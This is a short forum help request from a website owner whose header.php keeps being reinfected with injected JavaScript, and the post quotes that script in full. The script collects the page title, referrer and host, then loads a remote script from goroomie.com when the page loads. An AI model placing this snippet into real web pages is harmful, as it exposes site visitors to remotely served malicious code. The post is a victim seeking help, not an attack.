Malware Injection into Header.php (Website pings another website while loading)
-
Hello everyone,
When my website is loading,I noticed (at the bottom left corner of the browser) that the website contacts another website.
e.g.
connecting to unknownwebsite.comI have contacted my service provider (bluehost) and even paid 250USD for their services to fix the problem. But it came back within 72 hours.
I contacted them and they said that I had to pay again. I see no sense in this because the first attempt didn’t solve the problem and it’s easy to see that they do not care about fixing my problem at all.
The code appears in Header.php
This is what it looks like:
<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://goroomie.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
As mentioned, I have tried removing these lines of code, but they reappear over and over again. This has affected all my websites in the same host. And I am using the feather theme which I purchased legitimately.
Can someone who knows what to do point me in the correct direction? I need help.
The topic ‘Malware Injection into Header.php (Website pings another website while loading)’ is closed to new replies.